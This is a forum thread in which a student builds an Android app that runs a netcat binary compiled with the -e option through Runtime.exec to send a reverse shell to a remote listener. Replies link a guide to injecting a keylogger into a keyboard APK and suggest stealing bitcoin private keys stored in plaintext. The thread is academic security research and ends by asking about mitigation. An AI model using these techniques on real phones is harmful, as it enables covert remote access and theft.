Build Security Holes into Android App

mossy464

Hi All,

I'm working on an android app as part of a college project.

The project is related to android security and one part of it is going to involve building a security hole into the app and then demonstrating exploiting that security hole by being able to access the phone remotely.

Im unsure how to build a security hole into the app though. Can anyone recommend how this could be done?

Maybe, allowing the app some elevated permissions that allow an attack. Or maybe opening certain ports.

Cheers

The Corinthian

mossy464 wrote: »

Im unsure how to build a security hole into the app though. Can anyone recommend how this could be done?

I recommend you Google for some examples of security holes and then replicate them.

One that pops to mind is to write an app that allows you to store passwords - which you do in a text file in the protected app storage. Then write a second app, and give it root permissions, that navigates to that file and reads the file with the passwords. The moral of the story being that you should always encrypt such data.

You could store that file also on the external card, which is accessible without root permissions - but I'm not sure if that really qualifies as a security hole as opposed to just really, really dumb coding.

Or maybe opening certain ports.

Were you thinking of writing a server app?

mossy464

Thanks for the suggestions. Not thinking of doing a server app.

This app is one part of my thesis for my MSc. Also doing pen testing on android and iphone but currently trying to find the best way of doing it.

The Corinthian

mossy464 wrote: »

Thanks for the suggestions. Not thinking of doing a server app.

This app is one part of my thesis for my MSc. Also doing pen testing on android and iphone but currently trying to find the best way of doing it.

Pen testing of what?

From what you've stated, you are seeking to demonstrate security flaws in an Android app that can be exploited. For this you're essentially going to have to write two apps; one app which is the target with the hole and a second one to exploit it (although it may not necessarily have to be an app, if what you're doing is, for example, demonstrating how transmitted data may be intercepted).

So your first port of call should really be to identify what your hole is (no pun intended), not to go out and try to discover a brand new one - it's only an MSc after all. Hence why I'm not entirely sure why you're doing any pen testing; it's a bit random.

I suggest you spend some time to research discovered holes and choose the one you want to recreate. Then write the solution to demonstrate it and write it up.

mossy464

Thanks again for your in depth replies. You are giving me plenty of food for thought. Kind of have a better idea of what I'm going to do now.

As part of my research proposal I stated I would perform pen testing of androids and iphones, i.e. trying to gain access with tools like metasploit etc.

From what I've seen online this will be pretty difficult with up to date phones as any known security vulnerabilities have been patched.

What you have suggested seems to be the best way to move forward with it.

The Corinthian

mossy464 wrote: »

As part of my research proposal I stated I would perform pen testing of androids and iphones, i.e. trying to gain access with tools like metasploit etc.

See how proposal padding before you've done some research can get you into trouble?

From what I've seen online this will be pretty difficult with up to date phones as any known security vulnerabilities have been patched.

Except you're not trying to exploit the OS, but an app and many have not been patched. Again find an example, write an exploitable app and then pen test it knowing in advance that one of your tests will find the expected exploit. Then you can write your own 'malicious' test solution to demonstrate what such an exploit would look like in the wild.

Then write it up, pad the start with a load on typical exploits, methodologies, the history of such exploits in mobile (you can go back as far as WTAI in WAP for this) and the end with conclusions/recommendation (best coding practices, yadda, yadda).

OK, I'm outta here; flight to catch!

mossy464

Looking on CVE details website it shows 26 CVE's, are these the only ones that have been found for Android? I was expecting more.

http://www.cvedetails.com/vulnerability-list/vendor_id-1224/product_id-19997/Google-Android.html

ironclaw

Just to add my two cents, iOS is fairly locked down from a security perspective. Very few of the Android-esque attacks exists on iOS due to the App approval procedure and the way Apps's can actually access the iOS system.

mossy464

ironclaw wrote: »

Just to add my two cents, iOS is fairly locked down from a security perspective. Very few of the Android-esque attacks exists on iOS due to the App approval procedure and the way Apps's can actually access the iOS system.

Yep. The main focus of the project is Android since its the most targeted platform and iOS is so secure.

The Corinthian

mossy464 wrote: »

Yep. The main focus of the project is Android since its the most targeted platform and iOS is so secure.

Popular misconception.

It's the vetting procedure that makes iOS more secure (and even then things slip through), not the OS. In terms of security flaws, there's not much difference between the two operating systems.

mossy464

The Corinthian wrote: »

Popular misconception.

It's the vetting procedure that makes iOS more secure (and even then things slip through), not the OS. In terms of security flaws, there's not much difference between the two operating systems.

Thanks, is the CVE list of 26 for Android the only CVE's for the platform? I was expecting more.

http://www.cvedetails.com/vulnerability-list/vendor_id-1224/product_id-19997/Google-Android.html

By searching on cve.mitre.org I found more but the majority of these are Adobe vulnerabilities.

http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=android

Atomic Pineapple

mossy464 wrote: »

Thanks, is the CVE list of 26 for Android the only CVE's for the platform? I was expecting more.

http://www.cvedetails.com/vulnerability-list/vendor_id-1224/product_id-19997/Google-Android.html

By searching on cve.mitre.org I found more but the majority of these are Adobe vulnerabilities.

http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=android

Indeed, most of Androids vulnerabilities come from poorly written applications rather than the OS itself.

The Corinthian

mossy464 wrote: »

By searching on cve.mitre.org I found more but the majority of these are Adobe vulnerabilities.

There's a surprise :cool:

mossy464

I've found the following blog about creating a reverse shell on the Android device.

http://blog.clutchmobile.com/2013/01/08/android-reverse-shell/

I think this is what I may try to recreate, I'm a bit confused about the use of netcat and busybox, has the blog poster compiled linux C versions of these to work with Android?

mossy464

So since earlier I've figured out a few things, basically about compiling netcat for Android. I've followed this tutorial

http://codeseekah.com/2012/08/07/port-forwarding-an-android-local-port/

I'm trying to get netcat across to my HTC Desire X via adb to the /data/local folder but permission denied. I'm trying to find a directory on the phone that is writable and will allow me to execute but so far no luck.

The phone is running Android 4.0.4.

Any ideas on this?

MyPeopleDrankTheSoup

spamming my own stuff here but i wrote a post about editing the swiftkey android keyboard APK to insert a keylogger that could be something you could use:
http://www.android-app-development.ie/blog/2013/03/06/inserting-keylogger-code-in-android-swiftkey-using-apktool/

another vulnerability i noticed is this popular android wallet:
https://play.google.com/store/apps/details?id=de.schildbach.wallet&hl=en

it stores the bitcoin private key in plaintext. if you could root access on the phone, you could get this and steal the bitcoins

MyPeopleDrankTheSoup

mossy464 wrote: »

So since earlier I've figured out a few things, basically about compiling netcat for Android. I've followed this tutorial

http://codeseekah.com/2012/08/07/port-forwarding-an-android-local-port/

I'm trying to get netcat across to my HTC Desire X via adb to the /data/local folder but permission denied. I'm trying to find a directory on the phone that is writable and will allow me to execute but so far no luck.

The phone is running Android 4.0.4.

Any ideas on this?

i presume you've rooted your HTC Desire?

MyPeopleDrankTheSoup

The Corinthian wrote: »

Popular misconception.

It's the vetting procedure that makes iOS more secure (and even then things slip through), not the OS. In terms of security flaws, there's not much difference between the two operating systems.

and the fact that only apple signed code can run on non-jailbroken iOS?

The Corinthian

georgiecasey wrote: »

and the fact that only apple signed code can run on non-jailbroken iOS?

Yes, that was implied - or should have been better implied - by my statement.

mossy464

georgiecasey wrote: »

i presume you've rooted your HTC Desire?

No, its not rooted, but according to the tutorial I followed that folder should be writable on an unrooted phone. Its probably something to do with my particular HTC version of Android.

I was able to copy and execute to the data/local folder on an Android emulator but theres an issue with the ip address setup on the emulator so I cant netcat to it.

mossy464

Right, I got the copy of netcat copied to /data/local/tmp on my HTC desire and had to chmod it to give it execute permissions.

Does anyone know what versions of netcat include the -e option?

Trying to find one with this inlcuded and compile it for Android.

mossy464

I've got netcat compiled for android now with the -e option. I've started another thread about running commands like ping via android app code. See the following thread if you want to have a look.

http://www.boards.ie/vbulletin/showthread.php?t=2056973105

mossy464

Well, i've finally got something working properly.

I have an app now working which runs netcat and sends a reverse shell back to a listening server. It even works on non rooted devices.

Thanks for all the tips and suggestions on here.

mossy464

Well, i've finished the app and almost finished the thesis. Now I just need to make a suggestion on how to fix the problem that allows the app to work.

The app uses the runtime.getruntime().exec method to run the netcat arm binary from the app.

Does anyone know if there would be any way of blocking the use of this method?

Im trying to think of anything that would prevent the netcat binary from being run in the app.